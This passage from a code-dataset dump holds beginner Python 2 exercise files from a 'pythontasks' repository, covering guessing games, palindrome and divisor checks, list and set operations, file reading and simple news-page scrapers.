\"+str(abs(guessed-(guessed/2)))\n print \"Failed attempts so far \" + str(len(guessedlist))\n while guessed>0:\n generatenum(guessed,guessednew,guessedlist) # if the newlygeneratednum depending on customer input is bigger/or smaller we need to generate from smaller numbers array then\n else:\n guessedlist.append(guessed)\n guessednew=abs(guessed+(guessed/2))\n print \"next number range is up to \"+str(guessed)\n print \"Failed attempts so far \" + str(len(guessedlist))\n generatenum(guessed,guessednew,guessedlist) # if the num is smaller , then we need to generate from between last bigger numbers array and currently generated\n\n\nguessnum(\"Enter 'o' if guessed 'y' if the number is bigger than your guessed and 'n' if not: \",100/2)\n\n\n"
},
{
"alpha_fraction": 0.6246334314346313,
"alphanum_fraction": 0.6392961740493774,
"avg_line_length": 16,
"blob_id": "be31b8c220711141bf895cf2d2f73033668d59bb",
"content_id": "ebf9e405f62e52ac2dcfeab2ca790a9a525bfb4b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 341,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 20,
"path": "/task6.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "string=str(raw_input(\"enter string :\"))\nforward=[]\nbackward=[]\ni = 0\ni2 = 0\nfor c in string:\n forward.append(c)\nfor d in reversed(forward):\n backward.append(d)\n\n# backward = forward[::-1]\n\n\n\nif cmp(forward,backward) == 0:\n print (\"Lists are palindromes\")\n\n\nprint (\"backward :\" +str(forward))\nprint (\"backward :\" +str(backward))\n\n"
},
{
"alpha_fraction": 0.6741379499435425,
"alphanum_fraction": 0.6775861978530884,
"avg_line_length": 22.15999984741211,
"blob_id": "2d186e507a4c6333c7fa6df4766877991ad39aa2",
"content_id": "d777fdb925fbcdfb602f72a717ca65adb4745458",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 580,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 25,
"path": "/task22.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import os\nmylist=[]\ndir=os.getcwd()\nprint (dir) \n\ndef openfile2(myfile):\n with open(myfile) as f:\n #read file and strip end of line symbols while file is read\n content = f.readline()\n while content:\n mylist.append(content.strip()) \n content=f.readline()\n print mylist\n\n# List Separate list with Uniq items\n uniq = set(mylist)\n print uniq \n # strip values from end of symbol values\n #uniq = [elem.strip().split(',')for elem in uniq]\n for elem in uniq:\n num=mylist.count(elem)\n print str(elem) +\":\"+ str(num) \n\nmyfile = dir+\"/nameslist.txt\"\nopenfile2(myfile)\n\n"
},
{
"alpha_fraction": 0.6341772079467773,
"alphanum_fraction": 0.6430379748344421,
"avg_line_length": 19.657894134521484,
"blob_id": "e730b0536e6863d15a5f0ed9d7a7e5785489fbcd",
"content_id": "cdfec9cb854480dd2530d15db7a125da7b3aa756",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 790,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 38,
"path": "/task19.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import requests\nfrom bs4 import BeautifulSoup\nimport re\n#text=[]\ni=''\n\ndef striphtml(data):\n p = re.compile(r'<.*?>')\n text=p.sub('', data)\n return text\n\ndef filenameexist(filename):\n if not filename:\n return\n else:\n f=open(filename,'w')\n f.write('')\n f.close\n\ndef writef(filename, data):\n f = open(filename,'a')\n f.write(data)\n f.close\n\n\nbase_url = 'https://www.vanityfair.com/style/society/2014/06/monica-lewinsky-humiliation-culture'\nr = requests.get(base_url)\nsoup = BeautifulSoup(r.text,\"lxml\")\n#print soup.p.string\nfilenameexist('page.txt')\n\nfor story_text in soup.findAll(['data-reactid=','p']):\n item=striphtml(str(story_text))\n #text.append(item)\n #text.append('/n')\n #print(text)\n print (item)\n writef('page.txt',item + \"\\n\") \n \n"
},
{
"alpha_fraction": 0.48897796869277954,
"alphanum_fraction": 0.5030060410499573,
"avg_line_length": 28.294116973876953,
"blob_id": "0a086e499e56b71b68df0ceabcab6905a0e65a4e",
"content_id": "5185c7f07849b309ba9d8a040b287fc6e1012cb9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 499,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 17,
"path": "/task28.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "def inputvalues():\n x=int(raw_input(\"Enter variable1: \"))\n y=int(raw_input(\"Enter variable2: \"))\n z=int(raw_input(\"Enter variable3: \"))\n\n if x>=y :\n if x>=z:\n print \"variable1 is max: \" + str(x)+ \" > \" +str(y)+\" > \"+ str(z)\n else:\n print \"variable3 is max: \" + str(z)+ \" > \" +str(x)+\" > \"+ str(y)\n else: \n if y>=z:\n print \"variable2 is max: \" + str(y)+ \" > \" +str(z)+\" > \"+ str(x)\n else:\n print \"variable3 is max: \" + str(z)+ \" > \" +str(x)+\" > \"+ str(y)\n\ninputvalues()\n\n"
},
{
"alpha_fraction": 0.5753424763679504,
"alphanum_fraction": 0.6050228476524353,
"avg_line_length": 23.27777862548828,
"blob_id": "d1e430fa9e21b53823f34ca93b27141bc97b03b2",
"content_id": "f51c56f0b770fb3e7aec2df5b0beceda347d8fa6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 438,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 18,
"path": "/task9.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\na=random.randint(0,10)\ni=1\n\nwhile i > 0:\n userinput = raw_input(\"Enter Guessed value (enter 'exit' for exit): \")\n if userinput == \"exit\":\n exit(0)\n else: \n if int(userinput) in range (1,10):\n if int(userinput) == a:\n print (\"Congrats !!! You Guessed the digit from \" +str(i) + \" attempts!\")\n exit(0)\n else:\n print (\"Wrong...Please try again...\") \n i=i+1 \n else:\n print(\"enter value between 0 and 9\")\n\n"
},
{
"alpha_fraction": 0.6524216532707214,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 14.863636016845703,
"blob_id": "cd32fc1713654ce2711e8a0172a5e21f297026a3",
"content_id": "1aebe82c66e0cda0bcc3356c44ca0efda1c86863",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 351,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 22,
"path": "/task6_03.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import sys\nreverse=[]\ncounter=0\n\nword=raw_input(\"enter a palindrome word : \") \ne=int(len(word))\n#print reversed(word)\n#sys.exit()\ni=e\n\nwhile int(i)>0:\n i=i-1\n reverse.append(word[i])\nprint \"reversed word \"+str(reverse)\n\nfor n in range(e):\n if reverse[n]==word[n]: \n counter=int(counter+1)\nif counter>0:\n print \"PALINDROME !!!\"\nelse:\n print \"NOOO\"\n\n\n"
},
{
"alpha_fraction": 0.6797020435333252,
"alphanum_fraction": 0.7113593816757202,
"avg_line_length": 18.88888931274414,
"blob_id": "73cbca2808383b0ea93143db2c9824d46adcddd6",
"content_id": "5ab8e0b36ba62069f45357761f8facb06877a0f8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 537,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 27,
"path": "/task23.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "mylist1=[]\nmylist2=[]\nresultlist=[]\nimport os\ndir = os.getcwd()\n\nfile1=dir+\"/primenumbers.txt\"\nfile2=dir+\"/happynumbers.txt\"\n\ndef readfile(file1,mylist1):\n with open(file1,\"r\") as f:\n item=f.readline() \n while item:\n #print item\n mylist1.append(int(item))\n item=f.readline()\n print \"\\n File elements from \" + file1 \n print mylist1\n return mylist1\n\nreadfile(file1,mylist1)\nreadfile(file2,mylist2)\n\nresultlist=set(mylist1)&set(mylist2)\n\nprint \"\\n Result list of elements presented in both files\"\nprint sorted(resultlist)\n"
},
{
"alpha_fraction": 0.6237941980361938,
"alphanum_fraction": 0.6495176553726196,
"avg_line_length": 13.809523582458496,
"blob_id": "bea85dd327ac0319bf03b57ef3c3045ee0f27150",
"content_id": "6dd62af10a2fb7c2ba0ac5aef5afea49f3eddc07",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 311,
"license_type": "no_license",
"max_line_length": 39,
"num_lines": 21,
"path": "/task4.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "num = int(raw_input(\"Enter a digit :\"))\ni=0\nlistresult=[]\nwhile i < 100:\n x=num*i\n listresult.append(x)\n i=i+1\n\nprint(listresult)\n\n\n#----How should be----\n\nlistrange=list(range(1,num+1))\ndivisorlist=[]\n\nfor number in listrange:\n if num % number == 0:\n divisorlist.append(number)\n\nprint (divisorlist)\n"
},
{
"alpha_fraction": 0.36320754885673523,
"alphanum_fraction": 0.5188679099082947,
"avg_line_length": 18.272727966308594,
"blob_id": "95d3667875cb43f6ea3fe2656b4ed71f82c99082",
"content_id": "9ffa8ac2213a49c16d961bbc86d0e46eec779e63",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 212,
"license_type": "no_license",
"max_line_length": 52,
"num_lines": 11,
"path": "/task10.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\nfrom sets import Set\nx=[]\na = Set([1, 1, 2, 3, 5, 8, 13, 21, 34, 55, 89])\nb = Set([1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13])\n\n#x = a.intersection(b)\nx=a & b\n # x.append(i)\nfor i in x:\n print(i)\n"
},
{
"alpha_fraction": 0.579365074634552,
"alphanum_fraction": 0.6349206566810608,
"avg_line_length": 11.600000381469727,
"blob_id": "a04c9adf4a732f9125391adbf3fbac121e363c97",
"content_id": "56567a2958a2be75326e8c162da844b47c22cc1f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 126,
"license_type": "no_license",
"max_line_length": 32,
"num_lines": 10,
"path": "/task12.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "import random\na = random.sample(range(100),10)\n#print len(a)\nprint a\n\ndef slist(x):\n b =[x[0],x[len(x)-1]]\n print b\n\nslist(a)\n"
},
{
"alpha_fraction": 0.3333333432674408,
"alphanum_fraction": 0.5203251838684082,
"avg_line_length": 11.300000190734863,
"blob_id": "5c267bd1ffecf992e0c2011574cda524e7a5b197",
"content_id": "04e3c62c1f3b5c818b2b99cf43925dcc3f35c98b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 123,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 10,
"path": "/task14_02.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "a=[1,1,2,3,4,3,5,2,5,3,4,7,7,6,5,8,9,9,0,7,8,0,1]\n#print set(a)\n\nb=[]\n\nfor i in a: \n if i not in b:\n b.append(i)\n\nprint b\n"
},
{
"alpha_fraction": 0.5043103694915771,
"alphanum_fraction": 0.607758641242981,
"avg_line_length": 16.769229888916016,
"blob_id": "18b68fad5549b589092c634915feda81f74ecd0f",
"content_id": "43d134b19adf6a7e32e0cff638d09d18e4c5492c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 232,
"license_type": "no_license",
"max_line_length": 42,
"num_lines": 13,
"path": "/task7_02.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "\na = [1, 4, 9, 16, 25, 36, 49, 64, 81, 100]\n\n#Return even numbers\nb=[x for x in a if x%2==0]\nprint b\n\n#Sort By even numbers\ny=sorted(a, key=lambda v: (v%2==0, v))\nprint y\n\n#Return Odd numbers\nodd=[n for n in a if n%2 !=0]\nprint odd\n"
},
{
"alpha_fraction": 0.617977499961853,
"alphanum_fraction": 0.6292135119438171,
"avg_line_length": 25.649999618530273,
"blob_id": "4c518aa352bae9052b44566e350505ff6f464e6b",
"content_id": "c95f8ad7045b3044856cd8223cd88e2800abed09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 534,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 20,
"path": "/task2.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "num=int(raw_input(\"Enter any digit:\"))\ndivider=int(raw_input(\"enter divider: \"))\n\nresult=int(num) % 2\nfourresult=int(num) % 4\ncheck=int(num) % int(divider)\n\n#print(result)\nif result == 0:\n print (\"number \"+ str(num)+ \" even\")\nelse:\n print (\"number \" +str(num)+ \" is uneven\")\n\nif fourresult == 0:\n print (str(num)+\" number is a multiple of 4\")\n\nif check == 0:\n print (\"Num \" +str(num)+ \" divided evenly with divider \" +str(divider))\nelse:\n print (\"Num \" +str(num)+\" does not divide evenly with divider \"+str(divider) )\n\n"
},
{
"alpha_fraction": 0.6083333492279053,
"alphanum_fraction": 0.6166666746139526,
"avg_line_length": 23,
"blob_id": "f89d7fcc90f04f633e65b63e77f106e9212f51f2",
"content_id": "ccf21904a50ceee287e805880c8471a3975a2449",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 120,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 5,
"path": "/task6_02.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "word=raw_input(\"enter a palindrome word : \") \nif word[::-1]==word:\n print \"PALINDROME !!!\"\nelse:\n print \"NOOOOOO\"\n"
},
{
"alpha_fraction": 0.678260862827301,
"alphanum_fraction": 0.6834782361984253,
"avg_line_length": 26.33333396911621,
"blob_id": "4d051c2c2e7c962f6c1b73df3300f0ecc6079354",
"content_id": "7644a4a5d8505ac3f66522d94a837bae49efa2df",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 575,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 21,
"path": "/task17.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nimport re\nimport requests\ntitles=[]\n\nurl='http://nyt.com'\nr = requests.get(url)\nr_html=r.text\n\ndef striphtml(data):\n p = re.compile(r'<.*?>')\n print p.sub('', data)\n\nsoup=BeautifulSoup(r_html,\"lxml\")\nfor story_heading in soup.findAll(['class=\"balancedHeadline\"','h2']): \n# print soup.get_text(story_heading)\n titles.append(str(story_heading))\n striphtml(str(story_heading))\n\n#import subprocess\n#process = subprocess.call(\"curl -ikLsv 'https://nytimes.com'| sed 's/,/\\n/g'| grep 'promotionalHeadline' | cut -d':' -f2\",shell=True)\n\n"
},
{
"alpha_fraction": 0.6262924671173096,
"alphanum_fraction": 0.6366322040557861,
"avg_line_length": 16.8157901763916,
"blob_id": "3aa02a8c13b86047ff719d906485f25c6c85c98a",
"content_id": "369cebbea8a0248877683735f6499bdf1423adc5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 677,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 38,
"path": "/task11.py",
"repo_name": "vogd/pythontasks",
"src_encoding": "UTF-8",
"text": "def get_integer(text): \n# return int(raw_input(text))\n while True:\n try:\n return int(raw_input(text))\n break\n except ValueError:\n print \"Oops! That was no valid number. Try again...\"\n\n\nnum = get_integer(\"Enter integer :\")\n\ndivisorlist = []\n\n\nfor i in range(1,num+1):\n if num % i == 0:\n divisorlist.append(i)\nprint(divisorlist)\n\ndef divisor_def(i):\n if int(len(divisorlist)) == 2:\n print(\"Number entered is not even\")\n else:\n print (\"Number is even\")\n\ndivisor_def(i)\n\n\n#----How should be----\n\n# listrange=list(range(1,num+1))\n# divisorlist=[]\n\n# for number in listrange:\n# if num % number == 0:\n# divisorlist.append(number)\n# print (divisorlist)\n"
}
] | 33 |
TheVosges/ExcelEditor | https://github.com/TheVosges/ExcelEditor | 4884dc9f560a106252959d790856c63a43de52e9 | 80c2eedbc45f8b72d93b98f548b1df7a029b1eb8 | e7bab67b1ae0717ae650b388d93f26fef43670aa | refs/heads/main | 2023-07-24T05:48:16.231688 | 2021-08-19T11:11:31 | 2021-08-19T11:11:31 | 397,915,039 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.8039215803146362,
"alphanum_fraction": 0.8039215803146362,
"avg_line_length": 24,
"blob_id": "3046ef44ccae38d29950582aec438066c343e71e",
"content_id": "66fc783a634ab1f1d7a068c88d3c9683ce6e35c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 51,
"license_type": "no_license",
"max_line_length": 35,
"num_lines": 2,
"path": "/README.md",
"repo_name": "TheVosges/ExcelEditor",
"src_encoding": "UTF-8",
"text": "# ExcelEditor\nFile which deletes columns in excel \n"
},
{
"alpha_fraction": 0.5179760456085205,
"alphanum_fraction": 0.5399467349052429,
"avg_line_length": 28.079999923706055,
"blob_id": "20aa9fa272b937c0c09042301c2398c1c4a7906f",
"content_id": "731650be26c1dd544116e8d14765aeea36b1c05c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1502,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 50,
"path": "/to_csv_by_Arek.py",
"repo_name": "TheVosges/ExcelEditor",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Mon Jun 28 10:18:43 2021\r\n\r\n@author: R252202\r\n\"\"\"\r\nimport pandas as pd\r\nfrom openpyxl.workbook import Workbook\r\nfrom datetime import datetime\r\n\r\ndf = pd.read_clipboard()\r\n#print(df)\r\n\r\nwanted_values = df[[\"Product Value\", \"Product Description\", \"Value\", \"UOM\", \"Start Date\", \"End Date\"]]\r\n\r\n\r\ntoday = datetime.date(datetime.now())\r\nprint (today)\r\ni=0\r\nindexes = []\r\nfor cell in wanted_values[\"End Date\"]:\r\n i+=1\r\n try:\r\n #day = cell[:2]\r\n #month = cell[3:6]\r\n #datetime_object = datetime.strptime(month, \"%b\")\r\n #month_no = datetime_object.month\r\n #year = \"20\" + str(cell[7:])\r\n #date_str = str(year) + \"-\" + str(month_no) + \"-\" + str(day)\r\n if str(cell) != \"nan\":\r\n cell = str(cell)\r\n month_start = cell.find('-')\r\n month = cell[month_start+1:month_start+4]\r\n datetime_object = datetime.strptime(month, \"%b\")\r\n month_no = datetime_object.month\r\n date_obj = str(cell[:month_start]) + \"-\" + str(month_no) + \"-\" + \"20\" + str(cell[month_start+5:])\r\n date_obj = datetime.strptime(date_obj, \"%d-%m-%Y\")\r\n date_obj = date_obj.date()\r\n if date_obj < today:\r\n indexes.append(i-1)\r\n \r\n else:\r\n \r\n continue\r\n except TypeError:\r\n continue\r\n\r\nwanted_values = wanted_values.drop(indexes)\r\n\r\nstored = wanted_values.to_excel('Please_rename.xlsx', index = None )"
}
] | 2 |
Pythonian/flask-qa | https://github.com/Pythonian/flask-qa | 843825d186e720b56675ace0f9c2aad98328022b | f9cd424c5c678d0f22fa2a9553f43f1914220724 | 8f6f847f44d0009e224e580346178937fb029f9e | refs/heads/master | 2023-05-11T09:22:30.632968 | 2020-04-21T23:31:11 | 2020-04-21T23:31:11 | 257,740,244 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6344969272613525,
"alphanum_fraction": 0.6371103525161743,
"avg_line_length": 24.26886749267578,
"blob_id": "58469076dbba4f120a2124a9f65a4360fae4ff58",
"content_id": "f8c126b5e1fd88bd7aac958f12af970514c8e021",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5357,
"license_type": "no_license",
"max_line_length": 79,
"num_lines": 212,
"path": "/app.py",
"repo_name": "Pythonian/flask-qa",
"src_encoding": "UTF-8",
"text": "from flask import Flask, render_template, request, redirect, url_for\nfrom flask_login import (LoginManager, UserMixin,\n current_user, login_required, login_user, logout_user)\nfrom flask_sqlalchemy import SQLAlchemy\nfrom commands import create_tables\nfrom werkzeug.security import generate_password_hash, check_password_hash\n\napp = Flask(__name__)\n\nlogin_manager = LoginManager()\nlogin_manager.init_app(app)\nlogin_manager.login_view = 'login'\n\n\ndb = SQLAlchemy(app)\n\napp.config['SECRET_KEY'] = 'secret'\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///qa.db'\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\napp.cli.add_command(create_tables)\n\n\nclass User(UserMixin, db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(50))\n password_hash = db.Column(db.String(100))\n expert = db.Column(db.Boolean)\n admin = db.Column(db.Boolean)\n questions_asked = db.relationship(\n 'Question', foreign_keys='Question.asked_by_id',\n backref='asker', lazy=True)\n answers_requested = db.relationship(\n 'Question', foreign_keys='Question.expert_id',\n backref='expert', lazy=True)\n\n @property\n def password(self):\n raise AttributeError('Password is not a readable attribute')\n\n @password.setter\n def password(self, password):\n self.password_hash = generate_password_hash(password)\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(int(user_id))\n\n\nclass Question(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n question = db.Column(db.Text)\n answer = db.Column(db.Text)\n asked_by_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n expert_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n\n\[email protected]('/')\ndef index():\n questions = Question.query.filter(Question.answer is not None).all()\n context = {\n 'questions': questions\n }\n return render_template('home.html', **context)\n\n\n@login_required\[email protected]('/ask', methods=['GET', 'POST'])\ndef ask():\n if request.method == 'POST':\n question = request.form['question']\n expert = request.form['expert']\n\n question = Question(question=question,\n expert_id=expert, asked_by_id=current_user)\n\n db.session.add(question)\n db.session.commit()\n\n return redirect(url_for('index'))\n\n experts = User.query.filter_by(expert=True).all()\n\n return render_template('ask.html', experts=experts)\n\n\[email protected]('/answer/<int:question_id>', methods=['GET', 'POST'])\n@login_required\ndef answer(question_id):\n if not current_user.expert:\n return redirect(url_for('index'))\n\n question = Question.query.get_or_404(question_id)\n\n if request.method == 'POST':\n question.answer = request.form['answer']\n db.session.commit()\n\n return redirect(url_for('unanswered'))\n\n context = {\n 'question': question\n }\n\n return render_template('answer.html', **context)\n\n\[email protected]('/question/<int:question_id>')\ndef question(question_id):\n question = Question.query.get_or_404(question_id)\n\n context = {\n 'question': question\n }\n\n return render_template('question.html', **context)\n\n\[email protected]('/unanswered')\n@login_required\ndef unanswered():\n if not current_user.expert:\n return redirect(url_for('index'))\n\n unanswered_questions = Question.query\\\n .filter_by(expert_id=current_user.id)\\\n .filter(Question.answer is None)\\\n .all()\n\n context = {\n 'unanswered_questions': unanswered_questions\n }\n\n return render_template('unanswered.html', **context)\n\n\[email protected]('/users')\n@login_required\ndef 
users():\n if not current_user.admin:\n return redirect(url_for('index'))\n\n users = User.query.filter_by(admin=False).all()\n\n context = {\n 'users': users\n }\n\n return render_template('users.html', **context)\n\n\[email protected]('/promote/<int:user_id>')\n@login_required\ndef promote(user_id):\n if not current_user.admin:\n return redirect(url_for('index'))\n\n user = User.query.get_or_404(user_id)\n\n user.expert = True\n db.session.commit()\n\n return redirect(url_for('users'))\n\n\[email protected]('/register', methods=['GET', 'POST'])\ndef register():\n if request.method == 'POST':\n name = request.form['name']\n password_hash = request.form['password']\n\n user = User(\n name=name,\n password=password_hash,\n admin=False,\n expert=False\n )\n\n db.session.add(user)\n db.session.commit()\n\n return redirect(url_for('login'))\n\n return render_template('register.html')\n\n\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n if request.method == 'POST':\n name = request.form['name']\n password = request.form['password']\n\n user = User.query.filter_by(name=name).first()\n\n error_message = ''\n\n if not user or not check_password_hash(user.password, password):\n error_message = 'Could not login. Please check and try again.'\n\n if not error_message:\n login_user(user)\n return redirect(url_for('index'))\n\n return render_template('login.html')\n\n\[email protected]('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('login'))\n"
},
{
"alpha_fraction": 0.7636363506317139,
"alphanum_fraction": 0.8181818127632141,
"avg_line_length": 13,
"blob_id": "1eb7f547c6a13d0afcd5079ae79efa052a2a3565",
"content_id": "a4a4a0ea4654da101e9b22cccdb10321f2caeeb1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 16,
"num_lines": 4,
"path": "/requirements.txt",
"repo_name": "Pythonian/flask-qa",
"src_encoding": "UTF-8",
"text": "Flask==1.1.1\nFlask-Login\nFlask-SQLAlchemy\npython-dotenv"
},
{
"alpha_fraction": 0.75,
"alphanum_fraction": 0.75,
"avg_line_length": 17.399999618530273,
"blob_id": "b83ddc113da7a0960000602bfa5be286595e3949",
"content_id": "3fa4cc1582a16dd903fd124969b4dd9f7409251c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 37,
"num_lines": 10,
"path": "/commands.py",
"repo_name": "Pythonian/flask-qa",
"src_encoding": "UTF-8",
"text": "import click\nfrom flask.cli import with_appcontext\n\nfrom app import db, User, Question\n\n\[email protected](name='create_tables')\n@with_appcontext\ndef create_tables():\n db.create_all()\n"
},
{
"alpha_fraction": 0.7405063509941101,
"alphanum_fraction": 0.7405063509941101,
"avg_line_length": 30.600000381469727,
"blob_id": "7d6dcdbf0a824c466de4b4565778e421fef950d8",
"content_id": "7cc6a72c59677ee9ee0858c1acb91fc5a6bac655",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 158,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 5,
"path": "/settings.py",
"repo_name": "Pythonian/flask-qa",
"src_encoding": "UTF-8",
"text": "# import os\n\n# SQLALCHEMY_DATABASE_URI = os.getenv('SQLALCHEMY_DATABASE_URI')\n# SQLALCHEMY_TRACK_MODIFICATIONS = False\n# SECRET_KEY = os.getenv('SECRET_KEY')\n"
}
] | 4 |
yogesh696ksingh/DP-1 | https://github.com/yogesh696ksingh/DP-1 | ca74f7ec9fe74582dbb3864732d9a713beac6aae | b7eaf6be2a151810c3953b4b69f0bd54dd48e02d | 14ce83fb2b3aaa106b40edb1313c83dd78301243 | refs/heads/master | 2022-12-17T18:52:50.109311 | 2020-09-24T01:27:10 | 2020-09-24T01:27:10 | 298,131,497 | 0 | 0 | null | 2020-09-24T00:54:11 | 2020-06-29T01:28:39 | 2020-09-24T00:41:12 | null | [
{
"alpha_fraction": 0.5092748999595642,
"alphanum_fraction": 0.5328836441040039,
"avg_line_length": 28.649999618530273,
"blob_id": "f1f80726415a1814c38e365cd4973636a7d58a26",
"content_id": "591f94e6e28def987aac069253943fe88b33bd26",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 628,
"license_type": "no_license",
"max_line_length": 61,
"num_lines": 20,
"path": "/Problem2.py",
"repo_name": "yogesh696ksingh/DP-1",
"src_encoding": "UTF-8",
"text": "# Time Complexity : O(n)\n# Space Complexity : O(1)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : \n# Your code here along with comments explaining your approach\n\nclass Solution:\n def rob(self, nums: List[int]) -> int:\n if not nums:\n return 0\n if len(nums) == 1:\n return nums[0]\n dp = [0]*len(nums)\n dp[0] = nums[0]\n dp[1] = max(nums[0], nums[1])\n \n for i in range(2, len(nums)):\n dp[i] = max(dp[i-2] + nums[i], dp[i - 1])\n \n return dp[len(dp)-1]\n"
},
{
"alpha_fraction": 0.5762711763381958,
"alphanum_fraction": 0.5889830589294434,
"avg_line_length": 38.33333206176758,
"blob_id": "f509ade967c8fa869151e988cc62b54b47b59ae9",
"content_id": "05ea079d5f85f59a5d22fb8edd7f63d623f5f0fd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 749,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 18,
"path": "/Problem1.py",
"repo_name": "yogesh696ksingh/DP-1",
"src_encoding": "UTF-8",
"text": "# Time Complexity : O(S∗n). On each step the algorithm finds the next F(i) in n iterations, where 1≤i≤S. Therefore in total the iterations are S*n.\n# Space Complexity : O(S)\n# Did this code successfully run on Leetcode : Yes\n# Any problem you faced while coding this : \n# Your code here along with comments explaining your approach\n\nclass Solution:\n def coinChange(self, coins: List[int], amount: int) -> int:\n dp = [amount + 1] * (amount + 1)\n dp[0] = 0\n for coin in coins:\n for i in range(coin, amount+1):\n dp[i] = min(dp[i], dp[i - coin] + 1)\n \n if dp[amount] == amount + 1:\n return -1\n else:\n return dp[amount]\n"
}
] | 2 |
chouer19/zhuifengShow0919 | https://github.com/chouer19/zhuifengShow0919 | 1788fcdf267f05ec0ac48ce36343df52e2d3b64e | b17592854b0bacd39ca7eb9b388ad664e926f4af | 06bee4337cec04687f62987156cec508d756ef56 | refs/heads/master | 2020-03-28T06:03:29.385517 | 2018-09-18T06:52:49 | 2018-09-18T06:52:49 | 147,811,635 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6495327353477478,
"alphanum_fraction": 0.6915887594223022,
"avg_line_length": 25,
"blob_id": "f0a75f201568897e110ce27c995773453fc3b911",
"content_id": "23543236e7a73cfe0bf59ad034b3e5c4ba2cecba",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 214,
"license_type": "no_license",
"max_line_length": 50,
"num_lines": 8,
"path": "/src/steer/README.md",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
